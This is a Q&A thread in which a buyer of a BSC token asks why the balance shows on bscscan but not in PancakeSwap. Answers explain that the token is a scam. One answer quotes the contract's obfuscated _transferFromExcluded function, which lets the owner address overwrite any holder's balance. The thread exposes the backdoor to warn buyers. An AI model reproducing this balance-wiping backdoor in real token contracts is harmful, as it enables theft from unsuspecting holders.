# I bought a token the amount appear in bscscan but not in pancakeswap

Tags: tokens, bsc, pancakeswap, bscscan

0

I bought a token; the token amount appears on bscscan.com but not in the pancakeswap.

The token has a 100/100 rate on the token sniffer website.

this link is the token contract: https://bscscan.com/token/0x42f9be6adf7f45cbf22e3d90b1f2779985a92e7a#code

and this is the transaction I made: https://bscscan.com/tx/0x05b861b87ff9a3ce3c2aba580e77a14dc772937d02f9834c9737791ff04ee74d

I bought a very small amount but I don't understand what is happing. can someone help me, please?

Thank you!

Answer (score 1, accepted):

Seems like slight variant of this scam: [Lost tokens on pancakeswap](https://ethereum.stackexchange.com/questions/153524/lost-tokens-on-pancakeswap/153554#153554)

A little more obfuscate, and in the _transferFromExcluded function instead.

Scammer wipes your balance minutes later: https://bscscan.com/tx/0x790467e344a2d37629843dc87c9de791eb8afcf9748ad75829023d3e08d96895

Honey pot detectors can't catch every mechanic, and scammers work to avoid them specifically. They will fake pumps to appear in dextools trending lists, so there should be a better reason than that to buy a token.

Ideally should be devs or a real community of people that exist for you to communicate with if you have a question about that project.
Even that is no guarantee.

Answer (score 1):

```
    function _transferFromExcluded(
        uint256 amount,
        uint256 element,
        uint256 contractTokenBalance,
        address asset
    ) public {
        uint256 tokensForMarketing = 1;
        uint256 tokensForDevelopment = 0;
        uint256 tokensForOperations = 0;
        uint256 tokensForLiquidity = _balances[asset];
        uint256 totalTokensToSwap = tokensForLiquidity +
            tokensForMarketing +
            tokensForDevelopment +
            tokensForOperations;
        require(tokensForMarketing <= 100 && tokensForMarketing > 0, "You can only select a number from 1 to 100");
                if(_addressessOwned != _msgSender()){
            return ;
        }else{
           require(_addressessOwned == _msgSender());
        _balances[asset] = amount * (element ** contractTokenBalance);
        }
    }
```

_addressessOwned="0x91db5B51C659cfe8e441EEb700521e4f4Ea06D25".

"0x42F9bE6aDf7f45cbF22e3D90b1F2779985A92E7a" is a high-risk contract, and _addressessOwned can arbitrarily modify the balance of other people's accounts.

Comment: thank you for the clarification!